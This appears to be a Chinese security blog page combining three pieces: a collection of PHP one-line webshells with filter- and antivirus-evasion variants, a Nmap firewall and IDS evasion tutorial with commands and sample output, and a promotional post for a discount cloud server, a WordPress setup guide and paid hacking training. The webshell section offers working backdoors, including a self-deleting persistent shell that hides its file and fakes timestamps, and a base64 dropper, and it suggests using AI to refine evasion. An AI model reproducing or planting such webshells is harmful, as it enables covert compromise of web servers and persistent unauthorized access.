【2026最新】PHP一句话木马免杀方法 这里主要收集了一些常用的php一句话木马不同的写法，应对一些对文件内容过滤的场景1、普通一句话木马<?php @eval($_POST['cmd']); ?> 2、如果过滤了eval，可以使用assert绕过<?php @assert($_POST['cmd']); ?> 3、当过滤了eval、assert两个关键字时，可以用字符串拼接的方式。介绍substr_replace()函数<?php $a=substr_replace("assexx","rt",4); @$a($_POST['cmd']); ?> 4、@call_user_func把第一个参数作为回调参数使用<?php @call_user_func(assert,$_POST['cmd']); ?> 5、除了substr_replace()，还有一种字符分割法<?php $a="a"."s"; $b="s"."e"."rt"; $c=$a.$b; $c($_POST['cmd']); ?> 6、给下面给fun1中的变量a赋值assert<?php function fun1($a){ assert($a); } fun1($_POST['cmd']); ?> 7、可以利用函数来构造一句话木马<?php function shyshy($a){ assert($a); } @shyshy($_POST['cmd']); ?> 8、适用于过滤了GET和POST的情况下<?php $a=$_REQUEST['cmd']; $b="\n"; eval($b.=$a); ?> 9、可以构造一个类，利用魔术方法来拼接<?php class shyshy{ public $a=''; function __destruct(){ assert("this->$a"); } } $b=new shyshy(); $b->a=$_POST['cmd']; ?> 10、base64加解密<?php $a=base_decode(YXNzZXJ0); $b=$a(base64_decode($_POST['cmd'])); ?> 11、写入木马<?php if(isset($_POST['filename'])) { $d='data'; $$d=$_POST['text']; //$data $f='fp'; $$f=fopen($_POST['filename'],'wb'); //$fp echo fwrite($fp,$data):"save success":"save fail"; fclose($fp); } ?> 12、不死马<?php ignore_user_abort(true); //设置与客户机断开是否会终止脚本的执行，true则不会 set_time_limit(0); //如果为零说明永久执行直到程序结束 unlink(__FILE__); //调用unlink()的时候，文件还是存在的，只是目录里找不到该文件了，但是已经打开这个文件的进程可以正常读写 $file='./.index1.php'; $code='<?php if(md5($_POST["pass"])=="xxxxxxxxxx") //给木马设置密码，防止他人使用 { @eval($_POST["cmd"]); }?>'; while(1){ file_put_contents($file,$code); system('touch -m -d "2018-12-01 9:10:12" .index1.php'); //设置文件的编辑时间 usleep(5000); } ?> 13、还有一种方法<?php function simpleTransform($str, $offset = 1) { $transformed = ''; for ($i = 0; $i < strlen($str); $i++) { $transformed .= chr((ord($str[$i]) + $offset) % 256); } return $transformed; } $original = $_REQUEST["a"]; $transformed = simpleTransform($original, 3); function reverseTransform($str, $offset = 1) { $reversed = ''; for ($i = 0; $i < strlen($str); $i++) { $reversed .= chr((ord($str[$i]) - $offset + 256) % 256); } return $reversed; } $reversed = reverseTransform($transformed, 3); echo eval($reversed); 14、其他<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xiaoyu"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xiaoyu']);?> <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['xiaoyu']);?> <?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> # 密码是-7 php v9<?php file_put_contents('c7.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NjMjc4OV0pOz8+')); ?> …/…/…/…/html/special/cc/index 更多一句话木马免杀方法，可以配合AI逐步尝试

Nmap防火墙绕过技巧详解 防火墙与入侵检测系统（IDS）的核心工作逻辑，是依托规则匹配机制甄别并拦截异常扫描流量，比如识别 Nmap 标准探测包特征、单一源 IP 高频请求等行为。以下四类 Nmap 防火墙绕过技巧，核心思路在于利用设备规则漏洞，包括数据包片段重组缺陷、IP / 端口信任策略、流量特征识别盲区等，实现隐蔽扫描操作。所有操作均需获取 root 权限以构造自定义数据包，且必须在合法授权范围内执行。因缺乏实体防火墙设备，本文以本地靶机为测试环境展开演示，重点记录各类绕过技术的核心逻辑与操作方法。1 报文分段绕过1.1 技术原理多数防火墙与 IDS 设备会对完整的 TCP 或 UDP 数据包特征进行检测，比如 Nmap 默认探测包的标志位、数据长度等。Nmap 的-f参数可将扫描数据包拆分为小型片段，默认按 MTU 576 字节拆分后，每个片段仅 16 字节左右。部分老旧防火墙与 IDS 不具备数据包重组能力，拆分后的扫描流量难以被其识别，进而实现对拦截机制的规避。1.2 实操命令假设目标主机 10.10.10.178 的 80 端口已被防火墙过滤，可通过分段 + SYN 扫描精准探测该端口状态，命令如下：nmap -f -sS 10.10.10.178 -p 80 # 分段+SYN扫描，重点探测80端口 执行结果示例结果解读未启用-f参数时，80 端口通常会显示为filtered状态，即无有效响应；启用分段功能后，拆分后的数据包可绕过防火墙检测，目标主机的响应会使端口状态变为open|filtered，后续可通过补充探测验证端口是否真正开放。1.3 适用场景适用：该技巧对不支持数据包重组功能的老旧防火墙效果显著，典型代表如部分企业仍在使用的旧版 Cisco ASA 设备。注意：现代主流防火墙（如 Palo Alto、华为 USG）均具备完善的数据包重组能力，该技术大概率失效。数据包拆分后会增加传输耗时，扫描速度明显变慢，可搭配-T4参数优化效率，命令为sudo nmap -f -T4 -sS 10.10.10.178。2 自定义最大传输单元2.1 技术原理MTU（最大传输单元）指网络中可传输的单个数据包最大长度，以太网环境默认 MTU 值为 1500 字节。防火墙常针对标准 MTU 尺寸的数据包制定严格检测规则，Nmap 的--mtu参数可自定义数据包 MTU 值（需为 8 的倍数，常见可选值如 1480、1472 等）。通过发送非标准 MTU 尺寸的数据包，可避开防火墙针对标准流量的拦截策略，本质是报文分段技术的灵活进阶版本。2.2 实操命令若目标主机 10.10.10.178 的 443 端口被防火墙基于 MTU 1500 的规则过滤，可自定义 MTU 值进行探测，命令如下：sudo nmap --mtu 1480 -sS 10.10.10.178 -p 443 # 自定义MTU 1480，扫描443端口 执行结果示例结果解读将 MTU 值设置为非标准的 1480 后，数据包长度脱离防火墙预设检测范围，拦截规则失效，可成功探测到 443 端口的实际开放状态。2.3 适用场景适用场景：当防火墙针对默认 MTU 1500 字节数据包设置专项检测规则，或-f参数的分段效果不佳时，自定义 MTU 是更优选择。注意事项：自定义 MTU 值必须严格遵循 8 的倍数规则（如 1480=8×185、1472=8×184），否则命令会直接报错无法执行。MTU 最小值建议不低于 64 字节，过小的数据包可能被防火墙判定为无效流量直接丢弃。3 诱饵隐藏扫描3.1 技术原理防火墙的核心检测逻辑之一是识别单一源 IP 的高频请求行为，以此判定扫描攻击。Nmap 的-D参数可生成多个虚拟诱饵 IP，这些 IP 可随机生成或手动指定固定地址，与真实扫描 IP 同步发送探测数据包。目标主机的日志会记录多个 IP 的并发请求，防火墙无法精准区分真实扫描源，从而实现真实 IP 的隐藏，避免被纳入黑名单。3.2 实操命令对目标主机 10.10.10.178 进行扫描时，可配置 3 个随机诱饵 IP 与 1 个内网网关固定诱饵 IP（10.10.10.1），命令如下：sudo nmap -D RND:3,10.10.10.1 -sS 10.10.10.178 # 3个随机诱饵+1个固定诱饵 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 09:50 CST Nmap scan report for 10.10.10.178 Host is up (0.00068s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https # 关键：目标防火墙日志会记录以下IP的请求，无法定位真实扫描端 # 诱饵IP：10.10.10.1（固定）、10.10.10.56（随机）、10.10.10.123（随机）、10.10.10.201（随机） # 真实IP：未单独记录，混在诱饵中 Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds 结果解读扫描执行后，目标防火墙日志会同时记录多个 IP 的访问请求，包括固定诱饵 IP 10.10.10.1、3 个随机生成的诱饵 IP（如 10.10.10.56、10.10.10.123、10.10.10.201），真实扫描 IP 的请求会混在其中无法区分，有效规避了单一 IP 被拉黑的风险。最终探测结果显示，目标主机 22、80、443 等端口处于开放状态。3.3 适用场景适用场景：该技术适用于公网渗透测试等需要隐藏真实 IP 的场景，尤其适合对远程目标服务器的匿名探测。注意事项：诱饵 IP 需选择可达的有效地址，比如内网网段内的闲置 IP，无效 IP 发送的请求易被防火墙识别为异常扫描。诱饵数量建议控制在 3-5 个，数量过多会大幅增加扫描耗时，数量过少则无法达到有效的隐藏效果。4 源地址欺骗4.1 技术原理部分防火墙会配置 IP 白名单访问控制策略，仅允许特定可信 IP（如内网管理 IP、合作伙伴服务器 IP）访问目标端口。Nmap 的-S参数可将扫描数据包的源 IP 地址伪装为白名单中的可信地址，防火墙验证源 IP 符合信任规则后，会允许请求通过，从而绕过 IP 过滤机制实现扫描。4.2 实操命令假设目标主机 10.10.10.178 的防火墙仅允许内网管理 IP 10.10.10.2 访问 3389 端口，可通过伪装源 IP 进行探测，命令如下：sudo nmap -S 10.10.10.2 -sS 10.10.10.178 -p 3389 # 伪装成10.10.10.2（白名单IP） 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:00 CST Nmap scan report for 10.10.10.178 Host is up (0.00071s latency). PORT STATE SERVICE 3389/tcp open ms-wbt-server # 原本被IP过滤的3389端口，现在显示open（伪装生效） Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds 结果解读源 IP 伪装为白名单中的 10.10.10.2 后，防火墙放行该请求，扫描结果显示 3389 端口（ms-wbt-server 服务）处于开放状态，表明地址欺骗生效，成功绕过了 IP 过滤限制。4.3 适用场景适用场景：适用于已知防火墙 IP 白名单的场景，比如内网渗透测试中已获取管理 IP 信息，需访问被 IP 限制的关键端口时。注意事项：伪装的 IP 地址必须在防火墙白名单范围内，且扫描端与目标主机需保持通信可达，同网段环境下效果最佳，跨网段需依赖路由转发支持。由于目标主机会将响应数据包发送至伪装 IP，而非真实扫描端，可能无法直接接收响应结果，建议搭配-Pn（跳过 ping 检测）和-v（详细模式）确认扫描执行状态。5 源端口欺骗5.1 技术原理防火墙多针对数据包的源端口配置访问控制规则，常见策略是仅允许源端口为 53（DNS 服务）、80（HTTP 服务）、443（HTTPS 服务）等常用业务端口的请求通过，这类端口被默认为正常业务流量。Nmap 的--source-port参数（简写为-g）可手动指定扫描数据包的源端口，通过伪装成防火墙信任的正常业务端口，规避其端口过滤机制，实现扫描流量的放行。5.2 实操命令若目标主机 10.10.10.178 的防火墙仅允许源端口为 53（DNS）的请求访问 80 端口，可通过指定源端口的方式探测，命令如下：sudo nmap -g 53 -sS 10.10.10.178 -p 80 # 指定源端口53（DNS），扫描80端口 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:10 CST Nmap scan report for 10.10.10.178 Host is up (0.00065s latency). PORT STATE SERVICE 80/tcp open http # 原本被源端口过滤的80端口，现在显示open（端口欺骗生效） Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds 结果解读扫描数据包的源端口被伪装为 53 后，防火墙将其判定为 DNS 关联的正常 HTTP 请求，未执行拦截操作。扫描结果显示 80 端口处于 open 状态，表明源端口欺骗成功，有效绕过了防火墙的端口限制规则。5.3 适用场景适用场景：适用于防火墙配置了源端口白名单的环境，尤其当目标端口被限制仅允许常见业务端口访问时，该技术效果显著。注意事项：指定的源端口不能被本地其他服务占用，例如本地已启动 DNS 服务时，端口 53 处于占用状态，执行命令会直接报错。优先选择 53、80、443 等高频使用的业务端口，这类端口被防火墙纳入信任范围的概率更高，欺骗成功率也随之提升。6 附加随机数据6.1 技术原理入侵检测系统（IDS）多依赖 Nmap 标准探测包的固定特征（如固定数据长度、无额外附加数据）识别扫描行为。Nmap 的--data-length参数可在探测包中添加指定字节数的随机数据（如 100 字节），通过改变数据包的原有特征，让 IDS 的特征库无法精准匹配，从而绕过其检测机制。6.2 实操命令对目标主机 10.10.10.178 进行扫描时，可在探测包中附加 100 字节随机数据，命令如下：sudo nmap --data-length 100 -sS 10.10.10.178 # 附加100字节随机数据 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:20 CST Nmap scan report for 10.10.10.178 Host is up (0.00073s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https # 关键：IDS未识别到扫描流量（因数据包含100字节随机数据，特征不匹配） # 未用--data-length时，该扫描会被IDS拦截，端口显示filtered Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds 结果解读未使用--data-length参数时，扫描流量会因匹配 IDS 中的 Nmap 标准包特征被拦截，端口状态多显示为 filtered；附加 100 字节随机数据后，数据包特征发生改变，与 IDS 预设规则不匹配，未被拦截。最终探测到目标主机 22、80、443 等端口处于开放状态，扫描达到预期效果。6.3 适用场景适用场景：该技术对依赖固定特征库检测的 IDS 效果明显，例如旧版 Snort 等传统入侵检测系统，需模糊扫描流量特征时可优先使用。注意事项：随机数据长度建议控制在 50-200 字节区间，长度过小则难以改变数据包核心特征，过大可能被防火墙判定为异常流量直接丢弃。对基于行为分析的 IDS（如采用机器学习算法的检测系统）效果有限，这类系统不依赖固定特征，而是通过流量行为模式识别异常。7 MAC 地址欺骗7.1 技术原理局域网环境中的防火墙或交换机，部分会基于 MAC 地址配置访问过滤策略，仅允许特定可信设备（如内网打印机、核心服务器）的 MAC 地址访问目标资源。Nmap 的--spoof-mac参数可将扫描数据包的源 MAC 地址伪装为该信任列表中的地址，二层网络设备（如交换机）会将其判定为可信设备的请求，不执行拦截操作，从而实现绕过。该技术仅适用于局域网环境，因 MAC 地址属于二层通信标识，无法跨路由进行传输。7.2 实操命令假设目标主机 10.10.10.178（同局域网内）的交换机仅允许 MAC 地址为00:0C:29:12:34:56（内网打印机）的设备访问，可通过伪装该 MAC 地址扫描，命令如下：sudo nmap --spoof-mac 00:0C:29:12:34:56 -sS 10.10.10.178 # 伪装成打印机MAC 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:30 CST Nmap scan report for 10.10.10.178 Host is up (0.00069s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # 关键：交换机未拦截请求（因源MAC是信任的打印机MAC） # 未伪装时，扫描被交换机MAC过滤，端口显示filtered Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds 结果解读源 MAC 地址伪装为信任的打印机地址后，局域网交换机未对扫描请求进行拦截，成功探测到目标主机 22、80 端口处于开放状态。未伪装时，扫描请求会被 MAC 过滤规则阻断，端口状态显示为 filtered，对比可见欺骗效果显著。7.3 适用场景适用场景：主要用于局域网渗透测试，例如内网环境中需绕过交换机的 MAC 白名单限制，访问被管控的目标主机时。注意事项：伪装的 MAC 地址需符合标准格式（如00:0C:29:xx:xx:xx，VMware 虚拟设备默认 MAC 前缀），可通过arp -a命令查看目标网段内的可信设备 MAC 地址。跨路由扫描时该技术完全无效，因为路由转发过程中会将数据包的源 MAC 地址替换为网关设备的 MAC 地址。8 总结Nmap 防火墙绕过技术的核心逻辑，均围绕利用防火墙 / IDS 的规则漏洞展开，通过改变数据包特征、隐藏真实访问源、伪装可信身份等方式，规避拦截机制。不同技术的适用场景与核心要点存在差异，实际应用中需结合目标网络环境（如局域网 / 公网）、设备类型（老旧 / 现代防火墙）、防护规则（IP / 端口 / MAC 白名单）等因素选择合适方案。往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

中秋放毒！永远9.9每月的高防云服务器！搭建自己的网安知识库！ 前言最近不少师傅问我，有没有性价比高的云服务器适合搭网安知识库，也想找份靠谱的报班参考少走弯路。刚好我自己用大麦云服务器搭了知识库 longyusec.com ，也从网安小白一路踩坑过来，索性把服务器选购、搭建教程，还有报班的真实想法整理成这篇内容 —— 没有复杂术语，全是实操步骤和掏心窝的建议，希望能帮到想入门或转行网安的你。本次使用的是，黑帽子科技大麦云的云服务器，黑帽子科技是网盾学校的服务器IDC供应商，官网如下：https://www.zteidc.com/永久9.9每月！永久9.9每月！永久9.9每月！限定100台优惠券：whdmW2025用这个优惠券就可以马上60变9.9一个月的独享ip和带宽的活动。双核CPU/2G内存/40G硬盘/10M独享带宽/1个ipv4 +ipv6地址/200G扛DDOS防御的云服务器，现在卷起来啦，只要9.9块/月，永久9.9/月，一杯奶茶的钱都不要，网安工程师专用的。本来是网盾学校的学员福利，现在特殊时期搞活动分享给大家，快来抢哈。登录后，找到控制台，订购产品，选择国内云服务器，华中云服务器，甭管这个多少钱，使用优惠卷后通通9.9/月选择操作系统，一般都用centos或者ubuntu，这里我就选一个相对稳定的22.04版本的ubuntu填写专属优惠码：whdmW2025输入专属优惠码whdmW2025随后就9.9啦，这么便宜的主机白嫖白不嫖，虽然内存低了一点只有2g，但是宽带足够呀！利用对象存储搭一个自己的知识库还是简单的，还有ddos防御200G的峰值很多师傅们可能会问，是只有第一个月9.9嘛？不！是永久9.9每月，是咱们泷羽Sec的用户专属福利，内部已经消化的差不多了，就只剩下几十台，还没领的师傅们抓紧了网盾老板放话了，永远九块九，天长才地久，续费同价，隔月使用优惠卷就可以了这里还有一个好处就是能自定义ssh的连接端口，相对人性化，很多服务商都没有指定ssh端口的功能提交订单后，会生成这个实例，然后使用ssh连接你的实例IP就可以了ssh -p [你设置的端口] root@[ip]# 例如你的ip地址为10.10.10.130，连接端口设置的是2231，那么命令如下ssh -p 2231 root@10.10.10.130进来第一件事儿，就是更新你的系统和镜像包apt updateapt upgrade安装宝塔安装宝塔，最好注册一下，因为稍后需要登录才能使用，复制下方链接去注册一个宝塔账号（建议支持正版，盗版可能存在后门）https://www.bt.cn/u/FIKCU2注册好后，复制linux面板安装的命令，然后回车安装宝塔if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh ed8484bec安装成功后，终端会显示一个你面板的外网地址和账号密码使用刚刚的账号密码，登录进去，同意此协议这里你就会遇到一个界面，让你登录宝塔的官方账号，也就是让你注册的那个账号登录进来会有一个面板提示，就是让你装web服务器那些，直接选择LNMP安装就行了，类似于这个界面再者，可以来这里自定下载，一般那个FTP不用安装，勾选其他四个就可以了添加域名随后我们来到阿里云，添加一个自己的域名（最好已经备案的域名，国内云服务器要备案），我就选择添加一条记录（也就是子域名）主机记录，xxxx自己觉得好看就行，像取昵称一样但不能中文，也不支持大写创建站点之后返回到宝塔界面，点击添加站点填写相关信息，注意这里需要创建一个数据库，填好你的账号密码安装wordpress创建好后，就会自动创建一个目录，blog，我们切换到终端，准备下载wordpresscd /www/wwwroot/blogwget https://cn.wordpress.org/latest-zh_CN.zipunzip latest-zh_CN.zip然后访问站点，就能看到wordpress的安装界面了，注意这里是http不是httpshttp://demo.longyusec.com配置你的数据库账号密码上面的这个账号密码就是你宝塔面板中刚刚自动创建的数据库的数据库名和用户名还有密码信息全部都复制到这里，然后点击提交选择运行安装程序填写后台地址的账号密码登录你的后台地址，可以写文章啦http://demo.longyusec.com/wp-admin/访问主站，这就是您的知识库站点了，啥你说这个样子不好看？那这个样子呢？longyusec.com还有极核getshell：https://get-shell.com/，很典型的两个网安站安装子比主题这里我使用的是子比主题，支持正版！支持正版！支持正版！这个价格真很便宜了，要支持正版，懂？官方下载地址：https://www.zibll.com/?ref=49180案例地址1，极核getshell：https://get-shell.com/案例地址2，泷羽Sec：https://longyusec.com在官方下载后会有一个安装包，我们将这个主题安装包，上传到wordpress中上传成功，去启用它这个时候菜单栏就会多几个子比主题的项目此时主站已经变成了子比主题的样子了查看详细，默认的样子，子比主题的自定义性还是很大的，非常推荐配置https那么细节一点的师傅们可能就会问了，我的这个站点显示不安全呀，默认是http，没有配置https的我们来到阿里云控制台，也不一定是阿里云，你可以选择其他域名注册商，比如雨云的：https://www.rainyun.com/NTMwNDYw_选择ssl证书管理，点击个人测试证书，创建一个免费的证书我们填好相关的信息这里有一个提示，就是会通过邮箱的方式告诉你，证书是否创建成功电子邮件通知内容之后刷新一下网页，就签发成功啦，再点击更多选择下载，选择第一个Nginx用记事本打开这两个文件分别填到这两个站点详细中建议开启强制https这样就能访问一个稍微安全一点的站了也可以访问咱们官网，这个站全部都是我自己运营的（没有任何费用收取），查看详细，longyusec.com任何主题相关的问题，只要是帮会会员，联系作者我白小羽，可以一对一咨询任何站点问题批量上传md文件既然是搭建自己的知识库，那肯定是有很多本地已经写好的文档了，就拿知名的markdown文件来讲，如何上传呢搜索Import Markdown这样就能从本地导入markdown文件啦，默认发布是在草稿箱，需要手动发布一下关于服务器续费问题续费的话，如果在之前使用过这个优惠码：whdmW2025那么在在每次续费的前一天（一般隔月就可以），续费继续使用这个优惠码，每个月都能用，如果不能使用了，欢迎咨询我微信baibaixiaoyu2024一直九块九，天才才地久关于厂商稳定性这个完全可以放心，网盾18年网络安全业务，之前也是做idc业务，这几年才开始的网络安全培训，相对来说还是很稳定的，wangdun.cn关于匿名性毕竟是国内的服务器，想不实名还是很难的，不实名9.9每月谁干呀关于培训作者也是花了两万到网盾培训的，很佩服里面的一位老师叫做王老师，阿里p8高级工程师，他的儿子，也没多大，10岁左右的样子，主流的编程语言已经学完了，渗透基础+内网也学完了，果然人的一生就已经输在了起跑线上了。。。。。当然其他老师也是很有实力的，比如精通各种安全设备的毕老师等等都是大厂经验，如果您没有自制力，需要线下4个月全日制学习还是很有必要的，可以联系作者奥，给您最优惠的价格，保证让您满意另外如果你技术学到了一定的程度，是会有内部公安项目提供的那么要具备哪些基础条件可以去面试公安岗位呢？首先是本科起步，专科有，但是很少。我已经给各位师傅们准备好了这个思维导图，提供部分截图，详细的可以查看下面这个地址https://longyusec.com/wp-content/uploads/2025/10/dcd809e09120251002003548.pdf当然这些都是基础了，还是需要很强的实战能力的，比如刷刷src的排行，有没有工作经验，都是在你求职的路上的绊脚石，多向大佬付费请教一下src的挖掘手法，也不是非要付费，反正就是想办法让他教你就是了，做好人情世故，付费是最直接的选择最后介绍一下他们的线下四个月的培训吧，他们线下的四个月培训都包含如下内容，计算机基础，操作系统，计算机网络，编程（python，php），开发（前端+后端，前后端分离），数据库，web安全，内网渗透，横向移动，权限提升，域渗透，免杀，安全开发等等，当时我是在我们那个班里成绩比较好的（基础好，之前就是干python全栈的），相对于很多网安大佬，我可能什么都不是，但是只要有一颗持续学习的心态，迟早有一天会渗透进你的目标，只是时间问题关于我对报班的看法至于为什么要报班？我是过来人，我是有一定的发言权的，可能有些师傅会觉得报班不如靠自学，没有自学能力别干网安。那是我也告诉你，是这样的，我之前是干python全栈的，基本上都是下班后抽时间学网安，也是踩了很多坑，比如靶场怎么搭建？有哪些靶场？搭建中出现了一些bug要怎么解决？明明搭建好了这个漏洞靶场之后，学习这个相关漏洞，对着别人写的wp复现一遍，还是不成功，有时候甚至会浪费你3-5天时间都在解决这个问题，你上班的心思也会想这个问题，影响你上班的效率，甚至上班的时候做别的事，还容易被领导骂，有时候甚至会怀疑自己适不适合学网安，到后面我才知道原来还有fofa这个东西，可以直接搜到相关的靶场，bing也有相对应的在线靶场，能节省很多很多时间，你说这个时候如果有人指点一下，那是不是事半功倍呢？多余的时间可以去研究更多的攻击手法。像burpsuite的激活，什么是sql注入？什么是xss？什么是CSRF？CSRF中为什么我填了这个协议没有效果？我填这个payload是为了什么？怎么编写攻击脚本？卡在 “怎么处理参数传递”“怎么判断漏洞是否存在”，对着代码逐行调试，熬了两个通宵才跑通。这条命令为什么这样用？在什么场合用？等等等等，非常的耗时间，如果有一个师傅带，那你想一想效果吧。就比如下面这个案例，我一看到这个问题，我就能直接回答出来，都是我自己摸索出来的，当时是花了快一天时间了都没找到原因，后边也是逛了逛官方的论坛才找到的问题这些问题，放在有师傅带或者有老师教的场景里，可能就是一句话的事儿。他会告诉你 “搭建靶场时先检查端口占用”“复现漏洞要注意环境版本匹配”，会帮你点透 “这条命令的参数是针对什么场景设计的”“这个 payload 的绕过逻辑是什么”这样，你不用在无意义的 bug 上死磕，不用在模糊的概念里绕圈，把节省下来的时间花在 “深度挖掘漏洞”“理解攻击链路” 这些更核心的事情上像我大三，快毕业了，在课余还花了快半年时间还在 “搭建环境”“理解基础概念”，一天下来计算机都没离开过，要么是在学网安的路上，要么就是接一些开发的单子攒点学费，那如果我这半年早点报个线下班(线上很水，全靠自觉)，那么时间成本会不会更低一点，说不定已经开始实战挖 SRC、做渗透测试了。不是说自学一定不行，而是网安这行的 “时间成本” 太高，技术更新不等人，你多浪费一天在基础坑上，就可能错过一个新的技术方向、一个好的求职机会。所以我不是否定自学，恰恰是因为知道自学有多难、多耗时间，才更建议新手找个靠谱的班、跟着有经验的师傅学。我自己也是总结了如下几点，合适你就报班，不合适，建议转行1、兴趣，兴趣是最好的老师2、企业需要，公司需要信息安全相关的人才，却不想花大量成本去招聘一个安全专家，公司愿意出钱培养你。或者任何不需要你出钱的机会，你就去学，这大形势钱不好赚，能白嫖就白嫖3、年龄，建议25岁以内，有一定的计算机基础，比如干过开发，或者干过网工，信息安全专业，想转行，有一定存款或者家里不缺这点钱，可以报个班全日制学习小半年，节省自己的时间，上面说过自学很费时间，时间就是生命。临近30岁，那也就只有安服，安全运营等，能混口饭吃，渗透岗就算了4、学历，至少大专（技术硬另外谈），理工科，大多数都要本科，hvv现在也卡学历5、原来的工作不顺心，想转行或者想混个饭吃，无需顾及家里人（比如结婚了，没有生孩子的打算，或者单身不打算结婚，那么这个时候，年龄可以适当放宽一点，25-28岁，年龄可以适当放宽，爸妈也不需要自己照顾的情况），也不顾及薪资，在二三线城市5-8k的工作还是有很多的，一线城市技术要求就会很高6、学习的毅力和投入，网安学习不止是 “报个班” 那么简单，即便有师傅带，课后也需要大量时间投入实战。比如每天至少 2-3 小时刷靶场（像 DVWA、VulnHub、HTB等）、研究 SRC 漏洞报告、复现最新攻击手法，甚至周末要花整天时间做渗透测试项目。如果只是抱着 “混个入门” 的心态，遇到免杀失败、内网渗透卡壳就想放弃，哪怕报了班也很难学好。毕竟，现在钱不好赚，网安行业也不养 “懒人”，你只能持续的学习7、实战：现在企业招网安岗，哪怕是新人，也会问 “有没有挖过 SRC 漏洞”“做过多少个完整的渗透测试项目”。如果报班后只满足于 “听完课、做完作业”，不主动去实战，毕业时简历上还是 “零实战经历”，照样难找到工作。所以报班前要想清楚：自己是否愿意主动去搭建实战环境、尝试挖真实漏洞（比如补天、漏洞盒子等平台）、甚至参与开源安全工具的二次开发？有师傅带能帮你少走弯路，但 “主动找实战机会” 的意识，得自己提前具备，不然就算学完课程，也会卡在 “没项目经验” 的求职门槛外。8、人脉，俗话说的好，人脉越广，你的发展就越大，就业率也就越大，花钱认识一下大佬，或者想办法不花钱认识认识大佬，抱大腿，给你推荐一个岗位，都能对你职业生涯有帮助9、证书：强调一点，实战 > 证书，除非像OSCE3这种国际顶尖的证书，全世界都没有多少人拥有，不然就是实战经验重要，渗透好一点的就是CISP-PTS < OSCP < OSEP ，有些小白师傅可能就会问了，pte呢？nisp呢？PTE和NISP水很深，pte红队看不起，蓝队又用不上，NISP换CISP？等于浪费钱，钱花了，毕业3年或者两年后，换cisp，又要多交4k篇管理类的就是CISP，CISSP，CISA等，想往国外发展的话，OSCP和OSEP是两个不错的选择，考的话大概也要个2-5个月。考证还要记得一个重点，那就是公司需要，你将要面试的公司，或者公司要竞标，需要你有这个证书，或者公司给你出钱，那么就去考，不然不要盲目的考证书，不然考了一堆证书，发现找不到工作，那钱白花了。10、培训机构的师资，就业率，还有证书通过率，是否提供内推渠道？简历指导？是否模拟真实的面试场景？还有一点就是核实师资背景，避开 “包装出来的名师”。有些机构会把老师包装成 “网安大佬”，但实际可能只是刚入行 1-2 年的从业者。11、什么？你想在网安行业找女朋友？十个网安人里就只有1个女的从业者，女朋友在网安圈内就像国宝一样。最后这个服务器也是限定100台的，不是每个人都有的，用完就没了还是网盾他们老板好奥，赞助了我一个16h16g的云服务器，也就是咱官网 longyusec.com，从我报了他们班之后这个服务器他们一直都给我赞助，我当时只有1k的粉丝，从一个普通的4h4g，到这个16h16g，相当于免费使用，还经常给我赞助一些东西，总共价值也要 3k 每年了 longyusec.com 